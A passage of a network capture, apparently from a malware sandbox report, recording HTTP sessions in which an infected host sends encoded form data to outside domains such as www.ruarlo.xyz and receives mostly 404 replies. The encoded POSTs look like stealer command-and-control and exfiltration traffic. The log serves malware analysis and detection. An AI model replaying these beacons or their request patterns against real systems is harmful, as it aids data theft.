                                                                                                                                                                                                                        Data Ascii: 2rul-=CsTplFjYYWN71SPjl8YVF5932ufzlEkQv4qM78V1dlcPBIcU4krhk9gMWOyDdGAvjHJ5a66I76tQrqDDA8jE5fORKDMtwKgPn9HrVX9IKiigq+5qbDeU/fcwHycslnCV7QFQYp6Db8Yn6WGIEPD+2HlReuaWs3zBYllazwV7LtBvPEn8FkN1tBDBtF46zA48QtCq9J6RvIandbakvL71r7ZtXbaX9Tiqg0DSbGIINCePRYDteWYYT4FhhCWB//rFus0CFNhhwS+2drVW3Ynxu2+G8tDUPUyJQ2z1KuwXkNIU0850rd5GD8ETBhfICDLLDwwPG8YK454q8MHIZRHjs+jEs20kL1w2EseuxSoKVptusoO+0+bL1gb84wZcueQq4l2cIBWXQH/dmb+vIi2AfY+yqMFb5q0s2kj2AXaiuCRzsQYX2lwbUUYupdsr+Ee1Gy57tXjh+r/Y1lepsMRaWvWXeDqQyBOtrXYCI/NQvX42Om5rfIjYsgq41XvboRpjkAqkcLqoZWNW52sAka0q95cSxwjauAIggAYO7pJ7/Y32uq0A/BxGOqYnZZ1niM+3pS02CrlEXkacEAox3rDCuzyON8KGiHAZTiS0jdd4Y5d2h+nGXSIbFWiTfLJJwaEFEa42VPcbdg3hW4pYdX18Ua+sAXAAno62wfqWZr3zme7dU/sY2svFNOp7qjUxwrIJECc9YrvdIrHoryY+LBL5uVzIEJh7g8KJMpDT7iusfg659VY8yxnMZTawcjGj+dQh7C5dtyr/8VkLyiYlfA2D4ENo9O0+2UA5JP50wB9jyk/eKAQFJUYtZG9FEywrU8E4VHD9MACac7gnzuggpTQpCKt/DD8LEU2wqCV9sXpd68S4BpDrIF6LJaeeSfakum3QTx637Bix6yLre1ByTT6duw2CSlALwirN1y5YHTASgCUTK3orC2DeEPXVlXvo+nbzUVowZLUo/ue9I3ewWkml+Z0MHIHbsp7scwDGekkYk9pPss [TRUNCATED]
                                                                                                                                                                                                                        Oct 23, 2024 18:57:34.881460905 CEST1520OUTData Raw: 71 6e 55 43 73 45 57 41 50 39 37 33 4b 30 6e 6e 56 71 6d 51 54 30 33 44 59 7a 44 42 31 4e 72 70 72 75 48 66 67 4e 7a 46 70 4f 68 6b 66 6a 63 47 52 39 73 59 6f 44 2b 56 37 49 48 59 76 78 68 32 45 31 4f 52 44 4b 69 75 72 70 4c 2f 75 7a 45 44 30 2f
                                                                                                                                                                                                                        Data Ascii: qnUCsEWAP973K0nnVqmQT03DYzDB1NrpruHfgNzFpOhkfjcGR9sYoD+V7IHYvxh2E1ORDKiurpL/uzED0/cpogAv1IagNoVHlrKO7wpZwM+yTXmZ5/bcw16FTTFna/epzJMhnLTLDLFXK2Y9xMJ8stLYU1GxuwYW7MaKuCDOnvCzGoqVHFuM1eZMnw1ixbMFQoCR95YXiSnFeKHnYDxPASI4BicQgzFt0Hane5y1a3alK7ObHZ/


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                        65192.168.11.204985713.248.169.4880
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:57:37.520389080 CEST531OUTGET /7eim/?2rul-=Pu7Jmzu3dQpG1gjbkb05SIIv4sqt6U0nt6quxZgneXVsMN0V8VG/l4BYXcWzXHwprF18XqOi0/cpvqPHAvGxgIKtLyR40JNs4fmKbw9/FUzj8MMoXx+V66E=&Hh=g6BlO HTTP/1.1
                                                                                                                                                                                                                        Host: www.how2.guru
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:57:37.622842073 CEST390INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:57:37 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 250
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 32 72 75 6c 2d 3d 50 75 37 4a 6d 7a 75 33 64 51 70 47 31 67 6a 62 6b 62 30 35 53 49 49 76 34 73 71 74 36 55 30 6e 74 36 71 75 78 5a 67 6e 65 58 56 73 4d 4e 30 56 38 56 47 2f 6c 34 42 59 58 63 57 7a 58 48 77 70 72 46 31 38 58 71 4f 69 30 2f 63 70 76 71 50 48 41 76 47 78 67 49 4b 74 4c 79 52 34 30 4a 4e 73 34 66 6d 4b 62 77 39 2f 46 55 7a 6a 38 4d 4d 6f 58 78 2b 56 36 36 45 3d 26 48 68 3d 67 36 42 6c 4f 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2rul-=Pu7Jmzu3dQpG1gjbkb05SIIv4sqt6U0nt6quxZgneXVsMN0V8VG/l4BYXcWzXHwprF18XqOi0/cpvqPHAvGxgIKtLyR40JNs4fmKbw9/FUzj8MMoXx+V66E=&Hh=g6BlO"}</script></head></html>


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                        66192.168.11.2049858162.0.231.20380
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:57:42.798265934 CEST799OUTPOST /443n/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.ruarlo.xyz
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.ruarlo.xyz
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.ruarlo.xyz/443n/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 66 44 38 6c 4e 4d 6b 46 47 31 39 63 7a 78 59 55 41 47 6c 63 38 46 4d 44 5a 6a 46 46 73 6d 78 61 4f 69 6b 37 65 55 35 79 6f 57 6c 4b 2b 61 75 44 7a 63 4e 7a 55 55 31 48 5a 6d 74 76 68 70 61 62 30 6f 34 46 54 4b 30 6d 4d 39 4b 4f 6f 51 74 75 59 4f 56 52 53 5a 6e 57 68 58 7a 69 73 51 44 45 36 43 34 67 59 6e 43 62 32 33 49 51 67 43 36 72 79 4b 42 6d 37 53 35 6d 6e 55 6d 2b 68 37 78 32 5a 42 52 50 36 52 2b 66 39 6d 44 6e 50 4e 63 31 31 5a 79 33 45 74 6f 72 73 34 4b 65 6b 69 39 6e 58 6a 61 44 56 39 4a 2f 68 73 42 2b 2b 4c 69 49 66 61 59 70 51 4c 36 30 6b 30 2b 64 45 51 41 48 31 67 3d 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=fD8lNMkFG19czxYUAGlc8FMDZjFFsmxaOik7eU5yoWlK+auDzcNzUU1HZmtvhpab0o4FTK0mM9KOoQtuYOVRSZnWhXzisQDE6C4gYnCb23IQgC6ryKBm7S5mnUm+h7x2ZBRP6R+f9mDnPNc11Zy3Etors4Keki9nXjaDV9J/hsB++LiIfaYpQL60k0+dEQAH1g==
                                                                                                                                                                                                                        Oct 23, 2024 18:57:42.986118078 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:57:42 GMT
                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                        Content-Length: 389
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                        67192.168.11.2049859162.0.231.20380
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:57:45.483475924 CEST819OUTPOST /443n/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.ruarlo.xyz
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.ruarlo.xyz
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.ruarlo.xyz/443n/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 66 44 38 6c 4e 4d 6b 46 47 31 39 63 7a 56 63 55 4d 46 64 63 74 31 4d 41 57 44 46 46 6c 47 78 65 4f 69 6f 37 65 56 74 69 6f 67 31 4b 39 37 65 44 79 5a 78 7a 58 55 31 48 52 47 74 71 76 4a 61 6d 30 6f 30 6a 54 4f 6f 6d 4d 39 65 4f 6f 56 52 75 66 39 39 4f 54 4a 6e 55 30 48 7a 67 6f 51 44 45 36 43 34 67 59 6e 57 68 32 33 67 51 6a 79 71 72 77 72 42 6e 34 53 34 55 33 6b 6d 2b 6c 37 77 78 5a 42 51 71 36 55 6e 36 39 67 48 6e 50 4d 4d 31 77 59 79 30 4e 74 6f 74 76 49 4b 56 67 53 70 73 59 51 32 4c 46 66 4e 38 6e 2b 4e 73 37 64 76 53 43 6f 73 4e 54 59 6d 47 67 45 48 31 47 53 42 63 6f 6b 64 35 41 54 6c 47 5a 70 50 30 7a 50 66 4e 73 58 51 6e 4d 53 49 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=fD8lNMkFG19czVcUMFdct1MAWDFFlGxeOio7eVtiog1K97eDyZxzXU1HRGtqvJam0o0jTOomM9eOoVRuf99OTJnU0HzgoQDE6C4gYnWh23gQjyqrwrBn4S4U3km+l7wxZBQq6Un69gHnPMM1wYy0NtotvIKVgSpsYQ2LFfN8n+Ns7dvSCosNTYmGgEH1GSBcokd5ATlGZpP0zPfNsXQnMSI=
                                                                                                                                                                                                                        Oct 23, 2024 18:57:45.658035040 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:57:45 GMT
                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                        Content-Length: 389
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                        68192.168.11.2049860162.0.231.20380
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:57:48.171219110 CEST2578OUTPOST /443n/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.ruarlo.xyz
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.ruarlo.xyz
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.ruarlo.xyz/443n/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 66 44 38 6c 4e 4d 6b 46 47 31 39 63 7a 56 63 55 4d 46 64 63 74 31 4d 41 57 44 46 46 6c 47 78 65 4f 69 6f 37 65 56 74 69 6f 67 39 4b 39 4e 4b 44 30 36 5a 7a 57 55 31 48 66 6d 74 72 76 4a 61 42 30 72 45 6e 54 4f 6b 32 4d 2f 6d 4f 71 7a 6c 75 61 4d 39 4f 63 4a 6e 55 32 48 7a 6a 73 51 43 65 36 43 6f 73 59 6e 47 68 32 33 67 51 6a 77 43 72 33 36 42 6e 2b 53 35 6d 6e 55 6d 36 68 37 78 57 5a 42 59 51 36 55 54 41 39 51 6e 6e 50 74 38 31 33 36 61 30 52 39 6f 76 71 49 4c 56 67 53 30 30 59 51 71 78 46 66 4a 57 6e 35 52 73 32 62 53 2b 64 62 73 68 49 4c 47 2b 36 45 4c 53 4a 52 74 75 71 30 38 4e 47 31 70 39 47 2f 6e 7a 38 4d 33 42 70 58 56 6e 52 69 35 5a 4e 62 34 47 46 63 4b 74 44 2b 6f 64 58 43 6f 67 42 4b 34 67 49 57 6e 62 47 76 37 73 46 63 63 6e 6a 71 55 6c 35 74 4c 4a 42 56 4a 69 41 33 48 36 58 2f 39 65 50 7a 71 74 76 61 41 69 2b 58 6c 70 62 36 71 61 43 74 54 7a 78 73 67 48 2b 76 47 2b 64 59 65 41 58 5a 39 63 46 67 65 4a 57 51 34 64 52 70 42 6a 39 61 77 67 37 51 67 70 6d 6b 55 46 46 46 38 7a [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: 2rul-=fD8lNMkFG19czVcUMFdct1MAWDFFlGxeOio7eVtiog9K9NKD06ZzWU1HfmtrvJaB0rEnTOk2M/mOqzluaM9OcJnU2HzjsQCe6CosYnGh23gQjwCr36Bn+S5mnUm6h7xWZBYQ6UTA9QnnPt8136a0R9ovqILVgS00YQqxFfJWn5Rs2bS+dbshILG+6ELSJRtuq08NG1p9G/nz8M3BpXVnRi5ZNb4GFcKtD+odXCogBK4gIWnbGv7sFccnjqUl5tLJBVJiA3H6X/9ePzqtvaAi+Xlpb6qaCtTzxsgH+vG+dYeAXZ9cFgeJWQ4dRpBj9awg7QgpmkUFFF8zXWYXlbtghmb5EkaGZp2nnWSyTRDO08l4EfjUededA98lvBmcO7ri1xHKSEePL9WQUGZbLvsyatPrfeB5frvIpRYgP6eWOu0gtIeUq6i524SdfUe60G8MYfLWtHMoVkIZ/WusczghzQPSFv0xxTuQQf/A+eF21VMqpEHqshz8w06llOAyjS67BIogxEuI1ubM23F3j2CUcHBek+uICsZJPj9q2k6YUUhsOcwSdCv4ONBJ+uVAIn6rv/2z7Gjw5wZNEs/asH+4QlQQ6tyFva1Fr3DBIR+oY+Rs9VDnRL8FosyDXVU3XxD8eXUL9p+5XyiShxJfqo4GDrGsSszWnKonpnaFEY7lVJ42n9iFG0DCZj1Vg5c+eQy6yqhWRiiHVr3Fxxv9cR4gVn3daI/ooRDUlIaoFdlL77+owzL8M4iHc8eosKX7rNGQyrRLh14RH8SCzYz3q7zZ/YeUdrcyZmytwb5wWx02XC7fNi9bl75zMJbl5SsEC8VTsSeoktMMOzoVrbnGRhHMtstQ+sAqhZGXpyhIvfNcMJDixNmoJcIQdV8L1PTAQz+heqKtEv20mEmQkWvla0CZ/GVO5myYrAv+WeNCfiIzf7PCUKgDZgkr3BOCn968Uo0Ry7x5vyxYwwsyZcgu2cDYW9TgYXmWPCpW3xiMuR/ndOVcWZ [TRUNCATED]
                                                                                                                                                                                                                        Oct 23, 2024 18:57:48.171298981 CEST5390OUTData Raw: 6c 75 49 44 78 6a 32 71 4e 64 6f 70 44 6a 33 53 2f 35 6b 37 72 34 39 43 6e 37 4d 49 6f 31 65 68 53 49 4e 50 57 51 32 31 72 67 33 30 37 68 51 59 44 4f 77 44 74 30 53 73 79 74 62 31 51 5a 47 56 4d 44 4b 78 66 65 34 62 44 4b 50 73 4d 77 56 37 6d 71
                                                                                                                                                                                                                        Data Ascii: luIDxj2qNdopDj3S/5k7r49Cn7MIo1ehSINPWQ21rg307hQYDOwDt0Ssytb1QZGVMDKxfe4bDKPsMwV7mq6Qi4ui2c/O9rec0gSIVNsNlb86ZYGJZEijIrh/aNtLkaszdrfXLZnUynS1ciMPg6CWP6XQroQXUxGxGSYhAgCYo1LR9SI0AkNPqTFoh+bbWXzOPgdKBEyCJ//tJ83uEG1FFWIo+UchkJRjkh7Tc9era0lLpI/cgYt
                                                                                                                                                                                                                        Oct 23, 2024 18:57:48.352729082 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:57:48 GMT
                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                        Content-Length: 389
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                        69192.168.11.2049861162.0.231.20380
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:57:50.863835096 CEST532OUTGET /443n/?Hh=g6BlO&2rul-=SBUFO7UKbQxT/A0NMCw1slRydQol8mxlPD8CditPqx9i+IWA5JxkazMedHBluKiV/JkaYuM+MOSFojVsVdVmUJrzgHDhlyielwZPRH6/6joZww29waA6pwk= HTTP/1.1
                                                                                                                                                                                                                        Host: www.ruarlo.xyz
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:57:51.034414053 CEST548INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:57:50 GMT
                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                        Content-Length: 389
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                        70192.168.11.20498623.33.130.19080
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:57:56.157155037 CEST811OUTPOST /2x6z/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.refs4refs.info
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.refs4refs.info
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.refs4refs.info/2x6z/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
